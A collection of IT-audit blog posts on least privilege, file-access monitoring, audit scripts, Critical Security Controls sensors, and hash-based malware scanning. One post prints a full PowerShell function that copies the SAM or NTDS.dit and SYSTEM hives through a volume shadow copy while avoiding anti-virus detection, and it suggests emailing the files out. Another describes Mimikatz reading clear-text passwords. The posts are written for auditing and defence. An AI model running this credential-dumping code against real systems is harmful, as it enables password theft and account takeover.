Using File Monitoring to Limit Admin Rights

Over the past few weeks we have been posting blogs about the importance of limiting user account rights to only what is necessary for someone to do their job. Users should have all the rights necessary to do their job, but nothing more. This includes local administrator rights: only the people who absolutely need those rights should be given them. It is also our argument that fewer people actually need those rights than people generally believe. We’ve also posted a few times already on the dangers of giving people too many rights on a system. And remember, this applies to both Windows and Unix systems. Just because you can log in as root doesn’t mean you should.

A question that comes up a lot though is, “What about software programs that require the user to be a local administrator in order to run?” Well, as I argued in a previous post, most programs don’t need actual local administrator rights; they just need access to an object that the current user doesn’t have access to.

Some of the most common objects that users do not have rights to are file system objects. Now in a perfect world, software developers would write their programs to only access portions of the file system that are accessible to everyday users. Or at a minimum, developers would document which file system objects their software needs to access in order to run. Of course, reality says developers and documentation rarely go together. So how can a sysadmin figure this out for themselves?

In the old days, we could always use tools like Filemon and Regmon from Sysinternals to figure this out at a granular level. After Sysinternals was purchased by Microsoft, the tools were combined into one giant monitoring tool called Process Monitor. Don’t get me wrong, it’s a great tool and very capable of gathering system information. The trouble is it can be TOO powerful: sometimes there are so many things happening on a system that it can be difficult to isolate just the file system events. So it would appear we need a different tool, one that monitors only file system object events, to help us isolate where a user may need additional permissions.

In searching for an app that would do this, I wanted something that would be isolated to file system objects, have the ability to start and stop monitoring on command, have the ability to reset logs, and have the ability to export data to a CSV or similar format so I could manipulate the data in Excel later if I needed to. Oh, and it would be nice if the tool were free. Even better would be if the app were a portable app that I could bring with me in my toolkit without having to install it on a machine. That’s when I found Moo0 File Monitor.

Let’s say I wanted to run Microsoft Word as my test case. I want to make sure I know all the file system objects that Word needs to access in order to run on my machine. To gather my data I would need to:

  1. Close all open programs running on my computer (for the cleanest results).
  2. Open Moo0 File Monitor and make sure it’s gathering data.
  3. Clear the Moo0 logs to get a blank slate.
  4. Open the program I want to test (such as Microsoft Word).
  5. Close the program I’m monitoring to see files accessed on program exit.
  6. Click the Stop button in Moo0 File Monitor to stop collecting data.
  7. Save the Log File for later analysis.

The results of this process should be a list of files that were accessed during my session working with the software program in question. In this case when I tested it with Microsoft Word I received the following results:

[Screenshot: Moo0 File Monitor log showing the files accessed by Microsoft Word]

Now we can use this information to examine the permissions on each file system object listed in the log we created. Granted, this can be a tedious process, looking at each set of permissions one at a time. But if you’re patient, it can lead to giving people access to just the objects they need to run their applications, without giving them rights to all the files on the file system (i.e., local administrator). There may be more steps you need to take, such as looking at the registry or user right assignments as well, but this is often a good place to start and often solves the problem for you.
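
If you saved the log in CSV format, PowerShell can take some of the tedium out of this review. Here’s a minimal sketch of the idea – note that the “File Path” column name and the file locations are assumptions, so adjust them to match whatever your export actually contains:

#Pull the unique paths out of the saved log and dump each access
#control entry to a second CSV for review in Excel
$log = Import-Csv "C:\temp\moo0-log.csv"

$log | ForEach-Object { $_.'File Path' } | Sort-Object -Unique |
    Where-Object { Test-Path $_ } |
    ForEach-Object {
        $path = $_
        foreach ($ace in (Get-Acl $path).Access) {
            New-Object PSObject -Property @{
                Path       = $path
                Identity   = $ace.IdentityReference
                Rights     = $ace.FileSystemRights
                AccessType = $ace.AccessControlType
            }
        }
    } | Export-Csv "C:\temp\moo0-acls.csv" -NoTypeInformation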

Hopefully tools like this make it easier for you to give people only the rights they need to do their jobs. If you have other tools that you think will help, send us a note on Twitter at @isaudit. We’d love to hear what’s worked for you as well.

The Danger of Local Windows Administrator Rights

A couple weeks ago I wrote a blog post about limiting local Windows administrator rights – the importance of it and some of the things organizations can do to allow end users to work without having those rights (http://bit.ly/1hpyllB). One of the questions that has come up, and it always does, is the question – how bad is it if users have local administrator rights?

Obviously the easiest answer is BAD, REALLY BAD! It’s like buying a house or a car and then deciding that you don’t need locks on any of the doors. The reason we have file permissions, registry permissions, user right assignments, and the like in Windows is to limit ourselves to only the rights necessary for us to do our jobs. We shouldn’t have any more or any fewer rights than necessary. But when we give our end users administrator rights, it is as if we’ve taken all the locks off the doors and given those users the ability to go into any room of the house without our permission.

Ok, so beyond the simple answer, what else could happen on a machine if we allow users to be local administrators of their machines? Here are just a few of the things that could happen:

  1. System files can be accessed or changed.
  2. Program files or program configurations could be modified.
  3. Software that is not approved could be installed, and won’t be maintained.
  4. Malicious code can be installed with unlimited rights.
  5. New, unapproved user accounts could be added to the system.
  6. Password policies could be subverted.
  7. Security controls such as anti-malware, firewalls, and removable media controls could be disabled.

And as you can imagine, the list goes on and on…

One other fun issue to consider is passwords. Many people have heard of the pass-the-hash attack, where an attacker steals the local password hash from a machine and then replays it into the system’s memory whenever they want to authenticate as that user. This attack is certainly possible when users have local administrator rights. But wouldn’t it be easier to just steal passwords out of memory in clear text instead? Well, it turns out that’s possible too. Enter Mimikatz.

For a nice, long, technical explanation of how Mimikatz works, there are plenty of tutorials (although to be fair, many of them are in French). But here’s the bottom line: if your users are local administrators on their Windows machines, then by default they have the “Debug Programs” user right assignment (or they can assign themselves this right if it is taken away by a security policy). Once they have this right, they have the ability to interact with sensitive portions of memory, such as those where authentication credentials are stored. With that access they are able to read authentication credentials out of memory, as seen in the following screen capture:

[Screenshot: Mimikatz reading authentication credentials out of memory in clear text]

Not only are we able to read the NTLM password hash out of memory – which could be taken offline and cracked or used in a pass-the-hash attack – but we are given the password of every logged-in user in plain text. Even in the above example, where the user has a long password with upper case, lower case, numbers, and special characters, there is no need to spend the time or computing resources to crack the password, because it is there in clear text.
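
If you want to check this user right for yourself, a quick native command will show whether the current account holds the privilege. It appears as SeDebugPrivilege; note that a “Disabled” state in the output only means the privilege is not enabled in the current token, not that the account lacks the right:

#Check whether the current account holds the Debug Programs right
whoami /priv | findstr /i SeDebugPrivilege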

Many people might wonder at this point, is this only an issue in older versions of Windows? Unfortunately the answer is no. Version 1.0 of Mimikatz works all the way through Windows 8 (although Windows 8.1 does appear to be safe). Version 2.0 of Mimikatz works even with Windows 8.1 systems to manipulate this type of information. And if you were wondering, yes, there is integration between Mimikatz and the Metasploit Framework to make your penetration testing efforts easier. And, just because, there is also a Mimikatz plugin for Volatility if you’d like to use the tool against offline forensic memory dumps.

So once again, let’s restate the issue. How bad is it if end users have local administrator rights on their Windows machines? It’s BAD, REALLY BAD!! Both the Australian DSD, in their Top 35 Mitigation Strategies document, and the Council on CyberSecurity, in their Critical Security Controls document, list this issue as a serious concern. Hopefully we can all make sure to keep this issue in mind as we defend our systems.

Community PowerShell Security Audit Scripts

Back in December we posted a couple of scripts, pointed out to us by fellow auditors, that help dump Microsoft Windows file permissions to a CSV file for easier auditing. As a result of that post we’ve had feedback from a number of people that it would be helpful to see more of these scripts, along with suggestions for PowerShell audit scripts that we might want to share with others.

Two scripts immediately jumped out at us this past month as comprehensive PowerShell audit scripts that might help people who are auditing Microsoft Windows systems. They might inspire you to write your own script, or maybe you’ll just want to use them in the course of your audits. So we’ll share them here in the hopes that they make your life as an auditor easier.

The first script was posted to the Microsoft Script Center and was written to perform a comprehensive system audit of multiple machines that are detected in an Active Directory environment:

http://gallery.technet.microsoft.com/scriptcenter/Computer-Network-Audit-6593a48d

The second script we wanted to share was written by Alan Renouf and we especially liked this one because of the nicely formatted output after auditing a system:

http://poshcode.org/639

Both of these scripts illustrate the idea we’ve been trying to teach: automate your audit efforts. They are both good examples of what we hope you all are creating. If you do have further suggestions, please pass them along. You can email [email protected] if you have more resources you’d like us to share with the community.
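
And if you’d rather start small and roll your own, here’s a minimal sketch of the pattern both scripts follow – query the system (WMI in this case, using standard classes), collect the results as objects, and export them somewhere an auditor can work with them. The output file name is just an example:

#Collect a few basics about this system via WMI and write them to
#CSV for later review
$os = Get-WmiObject Win32_OperatingSystem
$cs = Get-WmiObject Win32_ComputerSystem

New-Object PSObject -Property @{
    ComputerName = $cs.Name
    Domain       = $cs.Domain
    Model        = $cs.Model
    OS           = $os.Caption
    ServicePack  = $os.ServicePackMajorVersion
    LastBoot     = $os.ConvertToDateTime($os.LastBootUpTime)
} | Export-Csv "$($cs.Name)-audit.csv" -NoTypeInformation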

Extracting Windows Passwords with PowerShell

Happy New Year! I hope everyone has had a great holiday season so far and is excited and ready for a new year full of auditing excitement! For the first post of the year I thought we would discuss a topic more for fun and something different, in the hopes of inspiring you to spend a little more time with PowerShell and scripting.

WARNING: Please do not attempt anything we’re about to discuss without clear permission from everyone and anyone you can think of. If you don’t have permission, don’t do it!! Anyways…

One problem auditors and penetration testers often have when auditing passwords is that most of the tools that are commonly used to extract passwords from a Windows system are viewed as malware by the anti-virus software installed on the system. Or if you have whitelisting software installed, then you are only able to execute the binaries approved in advance by management. But what if you want to rely on native tools and commands to do your assessment and you want to “live off the land”? That’s where Microsoft’s PowerShell comes in handy.

The folks at ObscureSecurity.com (http://www.obscuresecurity.blogspot.com/) contributed a function to the Microsoft Scripting Center called Get-PasswordFile. The idea of the script is to use native PowerShell functions to extract the local SAM database from a Microsoft Windows computer without causing damage to the underlying operating system or triggering an anti-virus alert. If you’re not sure what to do with a PowerShell function, here’s some advice you might want to read as well (http://www.mikepfeiffer.net/2010/06/how-to-add-functions-to-your-powershell-session/).

Here’s the code for their function:

function Get-PasswordFile { 
<# 
.SYNOPSIS 
 
    Copies either the SAM or NTDS.dit and system files to a specified directory. 
 
.PARAMETER DestinationPath 
 
    Specifies the directory to the location where the password files are to be copied. 
 
.OUTPUTS 
 
    None or an object representing the copied items. 
 
.EXAMPLE 
 
    Get-PasswordFile "c:\temp" 
 
#> 
 
    [CmdletBinding()] 
    Param 
    ( 
        [Parameter(Mandatory = $true, Position = 0)] 
        [ValidateScript({Test-Path $_ -PathType 'Container'})]  
        [ValidateNotNullOrEmpty()] 
        [String]  
        $DestinationPath      
    ) 
 
        #Define Copy-RawItem helper function from http://gallery.technet.microsoft.com/scriptcenter/Copy-RawItem-Private-NET-78917643 
        function Copy-RawItem 
        { 
 
        [CmdletBinding()] 
        [OutputType([System.IO.FileSystemInfo])] 
        Param ( 
            [Parameter(Mandatory = $True, Position = 0)] 
            [ValidateNotNullOrEmpty()] 
            [String] 
            $Path, 
 
            [Parameter(Mandatory = $True, Position = 1)] 
            [ValidateNotNullOrEmpty()] 
            [String] 
            $Destination, 
 
            [Switch] 
            $FailIfExists 
        ) 
 
        # Get a reference to the internal method - Microsoft.Win32.Win32Native.CopyFile() 
        $mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\')[-1] -eq 'mscorlib.dll')} 
        $Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native') 
        $CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))  
 
        # Perform the copy 
        $CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists']))) 
 
        $HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() 
 
        if ($CopyResult -eq $False -and $HResult -ne 0) 
        { 
            # An error occurred. Display the Win32 error set by CopyFile 
            throw ( New-Object ComponentModel.Win32Exception ) 
        } 
        else 
        { 
            Write-Output (Get-ChildItem $Destination) 
        } 
    } 
  
    #Check for admin rights
    if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
    {
        Write-Error "Not running as admin. Run the script with elevated credentials"
        Return
    }
        
    #Get "vss" service startup type 
    $VssStartMode = (Get-WmiObject -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode 
    if ($VssStartMode -eq "Disabled") {Set-Service vss -StartUpType Manual} 
 
    #Get "vss" Service status and start it if not running 
    $VssStatus = (Get-Service vss).status  
    if ($VssStatus -ne "Running") {Start-Service vss} 
 
        #Check to see if we are on a DC 
        $DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole 
        $IsDC = $False 
        if ($DomainRole -gt 3) { 
            $IsDC = $True 
            $NTDSLocation = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\NTDS\Parameters)."DSA Database File" 
            $FileDrive = ($NTDSLocation).Substring(0,3) 
        } else {$FileDrive = $Env:HOMEDRIVE + '\'} 
     
        #Create a volume shadow filedrive 
        $WmiClass = [WMICLASS]"root\cimv2:Win32_ShadowCopy" 
        $ShadowCopy = $WmiClass.create($FileDrive, "ClientAccessible") 
        $ReturnValue = $ShadowCopy.ReturnValue 
 
        if ($ReturnValue -ne 0) { 
            Write-Error "Shadow copy failed with a value of $ReturnValue" 
            Return 
        }  
     
        #Get the DeviceObject Address 
        $ShadowID = $ShadowCopy.ShadowID 
        $ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject 
     
            #If not a DC, copy System and SAM to specified directory 
            if ($IsDC -ne $true) { 
 
                $SamPath = Join-Path $ShadowVolume "\Windows\System32\Config\sam"  
                $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system" 
 
                #Utilizes Copy-RawItem from Matt Graeber 
                Copy-RawItem $SamPath "$DestinationPath\sam" 
                Copy-RawItem $SystemPath "$DestinationPath\system" 
            } else { 
             
                #Else copy the NTDS.dit and system files to the specified directory             
                $NTDSPath = Join-Path $ShadowVolume "\Windows\NTDS\NTDS.dit"  
                $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system" 
 
                Copy-RawItem $NTDSPath "$DestinationPath\ntds" 
                Copy-RawItem $SystemPath "$DestinationPath\system" 
            }     
     
        #Return "vss" service to previous state 
        If ($VssStatus -eq "Stopped") {Stop-Service vss} 
        If ($VssStartMode -eq "Disabled") {Set-Service vss -StartupType Disabled} 
}
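
Once the function is loaded into your PowerShell session (see the Mike Pfeiffer link above if you’re not sure how), running it is a one-liner. For example, assuming you saved the function to a script file named Get-PasswordFile.ps1 (the file name is just an example) and are working from an elevated prompt:

#Load the function into the current session, then copy the files
. .\Get-PasswordFile.ps1
Get-PasswordFile "C:\temp"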

Once you have the local SAM database from a computer, the next step would be to examine it offline in your favorite password cracking tool, such as Cain from http://www.oxid.it.

Those of you who know me know that I’m always a little hesitant to recommend that auditors consider password cracking at all. If an auditor chooses to run a script like this, there should be a clear business reason for doing so, and it should only be done with clearly documented management approval. But a script like this, which downloads the SAM database from a local computer, can still have quite a few benefits. Some of the controls an auditor might be able to test with this file are:

  • Are only the appropriate user accounts present on each local computer?
  • Are any local user accounts using blank passwords?
  • Are any local user accounts using the same password?
  • Are any local user accounts using passwords that do not match the organization’s password policies?

So what else could we do with this script? From an automation and penetration testing perspective there are all sorts of creative things we could do next. Just a few creative ideas you might consider:

  • Automate the script to download the local SAM database
  • Automate the script to encrypt the SAM database and email it to the penetration tester
  • Automate the script to run against multiple remote computers

There’s just all sorts of fun that a penetration tester or auditor could have with this tool if they really wanted to. Again, I hope this code is useful to you and your security efforts. To a great 2014!

Sensors for the Critical Security Controls

Most people in information security have heard of the Critical Security Controls these days. The idea of a community risk assessment project that helps us all prioritize our information security efforts is appealing to most of us. The sticking point everyone always comes back to, though, is “how do I start implementing an information security plan using the controls?”

There are a few different approaches to this question. One of the most common is to simply start at the first priority (#1) and work your way through the list. It’s designed to be simple to use.

Ideally, though, we would have a translation between the business requirements and the technical sensors security analysts need to deploy in order to achieve all the goals defined in the controls. So we took it upon ourselves to answer that exact question: if someone were to take every sub control in the Critical Security Controls (version 4.1) and map a corresponding sensor to each one, what would the resulting list of sensors look like?

This is the list that we came up with (in priority order):

  1. Hardware Inventory System
  2. Asset Inventory System
  3. Active Device Discovery Tool
  4. Passive Device Discovery Tool
  5. System Imaging & Cataloging System
  6. Authentication System
  7. Public Key Infrastructure (PKI)
  8. 802.1x Authentication System (RADIUS / TACACS+ / etc)
  9. Network Access Control (NAC) System
  10. Software Inventory System
  11. Software Whitelisting System
  12. SCAP Compliant Vulnerability Management System
  13. SCAP Compliant Configuration Scanning System
  14. Configuration Policy Enforcement System
  15. Patch Management System
  16. Vulnerability Intelligence Service
  17. File Integrity Assessment System
  18. Anti-Malware / Endpoint Protection System
  19. Email Anti-Malware System
  20. SPF DNS Record
  21. Web Based Anti-Malware System
  22. Web Application Firewall (WAF)
  23. Application Code Review / Vulnerability Scanning System
  24. Database Vulnerability Scanning System
  25. Application Specific Firewalls
  26. Wireless Network Device Management System
  27. Wireless Intrusion Detection System (WIDS)
  28. Backup / Recovery System
  29. Data Encryption System
  30. DHCP Server Logs
  31. Domain Name System (DNS) Monitoring System
  32. Host Based Data Loss Prevention (DLP) System
  33. Host Based Access Control Lists
  34. Host Based Firewalls / Endpoint Protection System
  35. Intrusion / Malware Detection System
  36. Log Management System / SIEM
  37. Network Based Data Loss Prevention (DLP) System
  38. Network Devices that Support VLANs & ACLs
  39. Network Proxy / Firewall / Monitoring System
  40. Password Assessment System
  41. Removable Media Control / Endpoint Protection System
  42. User Account Discovery / Inventory System

It certainly seems like a long list, but I would bet most companies already have many of these controls in place.

It seems to us that if an organization were to work their way through this list as part of a gap analysis and then review the controls, they would find that they had implemented the majority of the sub controls in the list simply by implementing these sensors. Certainly an organization will need to operationalize the controls too. But at least this might help a few organizations get started in their efforts.

Practical Risk Assessment Tools

In a previous blog post we cataloged a number of risk management methodologies that we’ve seen organizations employ in an effort to manage the security of their information systems. A number of people have asked us, though: what tools best assist people implementing those models? Are there tools available to make the process easier, or do companies have to develop their own tools to make one of these methods a reality?

Unfortunately the answer is that most of the companies we’ve worked with have chosen to develop their own risk management tools. Though to be fair, the majority of companies we meet choose to manage their efforts through very simple tools such as Microsoft Excel spreadsheets. While there’s nothing wrong with that, the questions inspired us to follow up the previous post with a list of some of the risk assessment toolkits we’ve seen people use.

In the open source world there are a few choices, and more seem to be springing up all the time as the need for visual risk assessment tools increases. Some of the more popular tools we’ve encountered are:

  • Binary Risk Assessment Tools
  • Babel Enterprise (free & commercial)
  • Cyber Security Evaluation Tool (DHS)
  • OSSIM SIEM (free & commercial)
  • SOMAP ORICO
  • Practical Threat Analysis (PTA) Professional

But this doesn’t mean that there aren’t commercial tools that are also available to purchase to jumpstart this process. Most tools in this commercial space are known as Governance, Risk, and Compliance (GRC) tools and Gartner even publishes a Magic Quadrant on the subject. Some of the more popular commercial tools are:

  • OpenPages Enterprise GRC
  • Thomson Reuters Paisley
  • Bwise GRC
  • Oracle Enterprise GRC Manager
  • MetricStream
  • Methodware ERA
  • Cura Enterprise
  • Archer Technologies SmartSuite
  • Protiviti Governance Portal
  • Mega Suite
  • Aline Operational Suite
  • CCH TeamMate, Sword, & Axentis
  • IDS Scheer ARIS

Hopefully this list gets you thinking and gives you a good place to get started as you consider which tool is the best option for you. Happy hunting!

Comparing Text Files in Windows

So last month we wrote a post about the built-in capabilities of Microsoft Windows for comparing two text files. Personally, when I am comparing two files, I want to be able to do it from the command line, easily automate the comparison, and get output that is easy to parse and understand.

Built into Windows, the three most common options I have seen for comparing text files are:

  • FC.EXE (Windows Binary)
  • COMP.EXE (Windows Binary)
  • Compare-Object (PowerShell cmdlet)
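
For reference, here’s the basic pattern with the PowerShell cmdlet – a minimal sketch assuming two text files, before.txt and after.txt, in the current directory:

#SideIndicator in the output marks the source of each differing line:
#"<=" means only in before.txt, "=>" means only in after.txt
$before = Get-Content .\before.txt
$after  = Get-Content .\after.txt

Compare-Object -ReferenceObject $before -DifferenceObject $after |
    Export-Csv .\diff.csv -NoTypeInformation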

As I have said before, Compare-Object is about the best option of the three, but it sure would be nice if the tool had more advanced options. Ideally we would all have access to a free utility that meets all the requirements we have been discussing here. But alas, I am not sure we are going to find that right now. So on the commercial side, what is left?

There are quite a few third party tools you might consider. Some of the more popular ones I have seen people use are:

  • WinDiff
  • ExamDiff
  • WinMerge
  • Beyond Compare

If you are looking for a free, open source utility that also works from the command line, then you should check out WinMerge. It definitely looks like an intriguing project, and it meets most of my requirements for a good file differential tool. You can learn more about it at http://winmerge.org/.

But lately I have been most impressed by Beyond Compare. The only downside to the product is that it is commercial, so if you’re planning on deploying it to a large number of systems you may need to shell out some coin. But it’s reasonably priced, so we cannot complain too much.

Not only does the tool meet all of our requirements, it also comes with a few other nice bells and whistles, like the ability to compare registry settings, support for the unified diff output format, more granular control over the comparisons themselves, and so on. We do not even get a commission from these folks, but their software seems to be the best suited if you’re looking for a fully capable system.

My guess is that most of us can get away with using WinMerge for day-to-day and basic differentials, even on a large scale. But if you really need more advanced capabilities, then forking over the money for a Beyond Compare license is likely worth it.

Searching for Hashes of Malicious Files (APT – Aurora)

A couple weeks ago I posted a blog article with some sample file hashes and domain names associated with the recent Google hacks (think APT or Aurora).

Since then I’ve had quite a few people ask me: if you have a system that you suspect might have been compromised, and you have a list of hashes that you know are malicious, how do you search that system for malicious files? In other words, you have a list of hashes and you want to know if any files on your file system have the same hash values.

Disclaimer – before we continue you should know that hashes of malicious files are just one way of attempting to discover whether your system has been compromised. Especially when dealing with a threat like APT, which is highly intelligent and adaptable, you have to assume that if the threat knows you’re on to them and looking for a specific set of hashes, they’re smart enough to adapt. What will they do? They’ll change their malicious files so the hashes change as well. There’s no doubt this is a limitation. But utilizing the technique we’re about to describe, you can at least start to eliminate some of the low-hanging fruit. You may also want to investigate the projects involved with fuzzy hashing, which may be an alternative to some of the standard techniques described here.

Ok, now that you’re ready to start examining your systems for malicious files, here is a process to consider:

Step One: Assemble a Text File of Known Malicious Hashes. The first step is to gather a list of hashes of known malicious files. This will be the list of hashes you’re scanning your system for. Remember, the value of your scan will only be as good as the list of hashes you have. A starter list of MD5 hashes is currently being hosted at Enclavesecurity.com and can be found here if you’re looking for a list to get you started. The list certainly is not comprehensive, but it is at least a place to consider building your first list from.

Step Two: Decide Which Hashing Tool to Use. There are a number of good tools that you can use to scan your system and generate hashes of all the files on your file system. Many of these tools are commercial, and there are open source options as well. On the commercial side, tools like Tripwire, Lumension, and Bit9 are quite effective at this. There are certainly others, but many of you are already using these tools, so you might as well take advantage of them. Unfortunately there are also many of you who simply cannot afford these tools. If you’re looking for a good open source tool to start scanning your systems with, let me recommend MD5Deep. It is a public domain tool that is especially useful for this purpose. While there’s not enough time in this post to cover how to use the tool in depth, we’ll post more on it later. You could also consider rolling your own scripts, using PowerShell or shell scripting, to generate these hashes (but I still recommend MD5Deep – it’s cross-platform, supports recursive file scans of directories, and natively interfaces with a number of hash databases).
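
As a quick taste of what that looks like – a sketch rather than a tutorial, so check the MD5Deep documentation for your version’s exact options:

#Recursively hash everything under C:\Users and print any file whose
#MD5 matches an entry in the known-bad list (-m enables matching mode)
md5deep -r -m known-bad-hashes.txt C:\Users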

Step Three: Scan Your System. Now that you have your list of hashes for malicious files and your scanning tool, it’s time to scan your system to see if any files with these hashes exist on it. This is the basic part of the exercise – do you have malicious files on your system or not? Depending on the tool you’re using, this process will be slightly different, but in the end you’re trying to determine whether you have a compromised host. Auditors – you should be asking companies the control question: if law enforcement approached you with a list of hashes like the ones we’re describing here and said you needed to check whether any of these files exist on particular hosts in your environment, how would you look for them? Ask to see the process in action (we want more than tabletop reviews here).

Step Four: Automate System Scans. Finally, once you have your tool working in manual mode, automate the scans. This is one of the major principles of the 20 Critical Controls / Consensus Audit Guidelines that we talk so much about. Manual scans are fine when you need them – but how much better would it be to implement a tool that constantly scans your systems and notifies you when one of the hashes is discovered? Automation is key.
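
A simple way to get started is to schedule the scan from Step Three with the built-in Windows task scheduler. Here’s a sketch; the task name, paths, and schedule are placeholders you would adapt to your environment and alerting process:

#Create a daily 2:00 AM task that runs the matching scan and logs the results
schtasks /create /tn "MalwareHashScan" /sc daily /st 02:00 /tr "cmd /c md5deep -r -m C:\hashes\known-bad.txt C:\Users > C:\hashes\scan-results.txt"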

While there are certainly other ways to go about looking for malicious files or other indicators of compromise on a system, examining file hashes certainly has to be part of your arsenal. If you’re auditing a system, knowing that there is a control in place to scan for signatures of known bad files has to be part of your toolkit. Traditionally we’ve done this with anti-malware tools, but unfortunately many of the large anti-malware vendors still don’t let you know which hashes they’re scanning for, and they don’t give you the ability to add hashes you’d like to scan for to their tools. Thus we’re left to our own devices to discover whether files with these signatures are on our systems.

Hopefully putting this tool in your toolkit gives you one more angle to consider when looking for indicators of a compromise on your systems.

Checklists a Day: Week in Review – October 5, 2009

So as promised, this last week we focused on the Software Development Lifecycle (SDLC) and how to audit an SDLC in an organization. As usual we also wanted to make sure that we gave everyone some fun technical tools to play with, so to keep with the theme we tweeted about tools that you could use to perform automated fuzzing tests on applications. There are a number of other tools we could have covered, and we could go on for a few weeks giving you tools, but hopefully you now have a good starter list of tools to use.

This week’s tweets have been a little more random in the checklists we’ve chosen, but the tools will all be consistent. We’re going to focus this week’s tools on the free tools Microsoft has embedded in the operating system to give auditors a hand with performing assessments against user accounts in an Active Directory environment. I hope you enjoy them!

We’ll post again next week – or follow us live at @jamestarala and @isaudit!

SDLC  Audit Checklists & Security Guides:

SDLC Checklist from Baylor University

SDLC Checklist from ISACA

SDLC Resources from Microsoft

White Box Fuzzing Checklist

Checklist for Auditing IT Contracts

Fuzzing Tools for Auditing Applications:

OWASP WSFuzzer

Wapiti

Microsoft MiniFuzz

iDefense’s Tools

HD Moore’s Axman

We hope everyone will enjoy and use these tools this week. If you have suggestions or ideas for future audit checklists or tools, please let us know, we’d love to hear your feedback.

Checklists a Day: Week in Review – September 28, 2009

So this week we’re back from Tweet-cation, and back to posting audit checklists and tools for everyone to enjoy. Last week I was teaching in San Diego for SANS Network Security and now I’m back and back on the bandwagon. We know everyone’s busy and it’s easy to miss some of these references, so here you go in blog format – which can now be indexed FOREVER by the Google Gods.

This last week’s topic was web application assessment, and we’ll continue the trend via Twitter this week with audit checklists for evaluating an SDLC and tools for fuzzing applications to boot! Not following me on Twitter yet? The handles are @isaudit and @jamestarala.  

Web Application Audit Checklists & Security Guides:

OWASP Web Application Checklist

Web Application Basic & Advanced Checklists

Microsoft – Web App Architecture

Basic SANS Institute Checklist

Tools for Auditing Web Applications:

W3AF

HP WebInspect

Wikto

IBM Appscan

We hope everyone will enjoy and use these tools this week. If you have suggestions or ideas for future audit checklists or tools, please let us know, we’d love to hear your feedback.